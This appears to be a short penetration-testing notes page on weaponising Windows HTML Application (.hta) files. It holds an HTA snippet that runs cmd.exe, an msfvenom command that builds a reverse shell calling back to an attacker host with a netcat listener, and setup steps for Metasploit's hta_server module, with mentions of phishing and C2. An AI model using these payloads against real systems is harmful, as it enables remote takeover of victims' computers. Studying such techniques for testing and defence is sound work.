HTML applications

Windows “HTML Applications” are just HTML files (with the .hta extension) containing JavaScript of VBScript. These are interpreted using the mshta.exe binary; IE and Edge will both helpfully offer to run these files after they’re downloaded.

A simple example that pops a command prompt:

<html>
	<body>
		<script>
			var command = ‘cmd.exe’
			new ActiveXObject(‘WScript.Shell’).Run(command);
		</script>
	</body>
</html>

Create malicious HTA files using Metasploit

How to exploit Windows HTML applications with msfvenom
msfvenom can be used to generate HTA refer shells.
msfvenom -p windows/x64/shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f hta-psh -o ${NAME}.hta
Catch with the standard nc -lvp $ATTACKER_PORT netcat command.

Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:

LHOST — the host IP address to connect back to

LPORT — the port to connect back to

SRVHOST — the host IP address to serve the malicious file on

payload — the Metasploit payload to use

In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (i.e., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!

Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
Link to original

Cardboard Iguana Security

Explorer

HTML applications

Create malicious HTA files using Metasploit

How to exploit Windows HTML applications with msfvenom

Graph View

Backlinks